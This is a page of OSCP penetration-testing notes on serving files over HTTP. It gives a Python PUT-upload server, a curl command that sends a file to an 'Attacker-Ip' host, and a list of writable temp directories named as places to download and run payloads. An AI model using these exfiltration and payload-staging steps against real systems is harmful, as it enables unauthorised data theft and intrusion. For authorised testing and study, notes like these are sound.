OSCP Notes

General

Setup HTTP Server

python -m SimpleHTTPServer

python3 -m http.server

Advanced HTTP server supporting the upload method

  • First, put this code into a .py file and save it:

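import SimpleHTTPServer

class SputHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_PUT(self):
        # Log the request headers to the console
        print self.headers
        length = int(self.headers["Content-Length"])
        # Map the URL path to a file under the current directory
        path = self.translate_path(self.path)
        with open(path, "wb") as dst:
            dst.write(self.rfile.read(length))
        # Reply so the client does not report an empty response
        self.send_response(201)
        self.end_headers()

if __name__ == '__main__':
    # Serves the current directory on port 8000 by default
    SimpleHTTPServer.test(HandlerClass=SputHTTPRequestHandler)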
  • After that, run it with python2; it will start the web server on port 8000.

  • Now you can upload a file to the attacker box with the following command:

curl -T file http://Attacker-Ip:8000
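
A Python 3 variant of the PUT handler above, as an added example that is not part of the original notes: it confines writes to one upload directory, refuses to overwrite existing files, caps the body size, and listens on a single chosen address. `UPLOAD_DIR`, `MAX_BYTES`, `safe_target`, `PutHandler` and `serve` are names and limits assumed for this example.

```python
import os
import sys
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, urlsplit

UPLOAD_DIR = os.path.abspath("uploads")   # assumption: dedicated drop directory
MAX_BYTES = 50 * 1024 * 1024              # assumption: 50 MiB cap per upload


def safe_target(url_path, upload_dir=UPLOAD_DIR):
    """Map a request path to a file directly inside upload_dir, or None."""
    # Keep only the final path component, after percent-decoding.
    name = os.path.basename(unquote(urlsplit(url_path).path))
    if not name or name.startswith("."):
        return None                       # empty name, "..", or dotfile
    target = os.path.join(upload_dir, name)
    # Never overwrite: a second PUT to the same name is refused.
    return None if os.path.exists(target) else target


class PutHandler(SimpleHTTPRequestHandler):
    def do_PUT(self):
        length = self.headers.get("Content-Length", "")
        if not length.isdecimal():
            return self.send_error(411)   # Length Required
        if int(length) > MAX_BYTES:
            return self.send_error(413)   # Payload Too Large
        target = safe_target(self.path)
        if target is None:
            return self.send_error(403, "name rejected or file exists")
        os.makedirs(UPLOAD_DIR, exist_ok=True)
        with open(target, "xb") as dst:   # "x": fail if the file appeared meanwhile
            dst.write(self.rfile.read(int(length)))
        self.send_response(201)
        self.send_header("Content-Length", "0")
        self.end_headers()


def serve(bind="127.0.0.1", port=8000):
    """Listen on one chosen interface instead of every address."""
    HTTPServer((bind, port), PutHandler).serve_forever()


if __name__ == "__main__":
    # Optional first argument: the address to bind to.
    serve(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1")
```

Run it with python3 and pass the address of the interface it should listen on as the first argument; uploaded files land in `uploads/` under the current directory.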

Temp File location

Temp directories generally have writable permissions, so we can use them to download and execute our payloads.

Linux

/tmp

/dev/shm

Windows

%systemdrive%\Windows\Temp

%userprofile%\AppData\Local\Temp

Last updated 3 years ago